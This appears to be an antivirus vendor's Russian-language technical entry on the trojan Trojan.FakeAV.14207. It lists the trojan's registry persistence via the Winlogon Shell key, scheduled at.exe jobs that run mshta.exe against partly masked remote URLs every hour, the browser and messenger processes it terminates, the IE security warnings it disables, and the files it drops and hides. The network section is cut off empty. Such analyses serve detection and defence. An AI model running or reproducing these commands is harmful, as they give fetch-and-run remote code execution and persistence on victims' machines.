Trojan.FakeAV.14207

Техническая информация

Для обеспечения автозапуска и распространения:

Модифицирует следующие ключи реестра:

[<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = '%APPDATA%\hotfix.exe'

Создает или изменяет следующие файлы:

%WINDIR%\Tasks\At16.job
%WINDIR%\Tasks\At17.job
%WINDIR%\Tasks\At18.job
%WINDIR%\Tasks\At13.job
%WINDIR%\Tasks\At14.job
%WINDIR%\Tasks\At15.job
%WINDIR%\Tasks\At22.job
%WINDIR%\Tasks\At23.job
%WINDIR%\Tasks\At24.job
%WINDIR%\Tasks\At19.job
%WINDIR%\Tasks\At20.job
%WINDIR%\Tasks\At21.job
%WINDIR%\Tasks\At4.job
%WINDIR%\Tasks\At5.job
%WINDIR%\Tasks\At6.job
%WINDIR%\Tasks\At1.job
%WINDIR%\Tasks\At2.job
%WINDIR%\Tasks\At3.job
%WINDIR%\Tasks\At10.job
%WINDIR%\Tasks\At11.job
%WINDIR%\Tasks\At12.job
%WINDIR%\Tasks\At7.job
%WINDIR%\Tasks\At8.job
%WINDIR%\Tasks\At9.job

Вредоносные функции:

Запускает на исполнение:

<SYSTEM32>\at.exe 15:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 16:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 17:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 12:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 13:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 14:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 18:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 22:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 23:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 19:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 20:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 21:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 11:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 01:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 02:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 03:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\mshta.exe http://re###t22new.com/inst.php?id######
<SYSTEM32>\cmd.exe /c ""%APPDATA%\sdrfzfgd.bat" "
<SYSTEM32>\at.exe 00:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 04:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 08:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 09:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 10:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 05:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 06:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################
<SYSTEM32>\at.exe 07:40 /every:M,T,W,Th,F,S,Su mshta.exe http://fu####andashow.com/sdfg.php?d0################

Завершает или пытается завершить

следующие пользовательские процессы:

skype.exe
iexplore.exe
opera.exe
YahooMessenger.exe
msnmsgr.exe
msn6.exe
firefox.exe
chrome.exe

Изменяет следующие настройки браузера Windows Internet Explorer:

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnOnPost' = '00000000'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnonBadCertRecving' = '00000000'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnOnZoneCrossing' = '00000000'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnOnPostRedirect' = '00000000'

Изменения в файловой системе:

Создает следующие файлы:

C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\RNUTGRVK\desktop.ini
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\4V29SZ2D\desktop.ini
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\SAL4E1OP\sdfg[1].php
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\TVHZ7QFW\desktop.ini
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\SAL4E1OP\desktop.ini
%APPDATA%\sdrfzfgd.bat
%APPDATA%\hotfix.exe
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\inst[1].php

Присваивает атрибут 'скрытый' для следующих файлов:

C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\RNUTGRVK\desktop.ini
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\TVHZ7QFW\desktop.ini
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\SAL4E1OP\desktop.ini
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\4V29SZ2D\desktop.ini

Самоудаляется.

Сетевая активность:

Подключается к: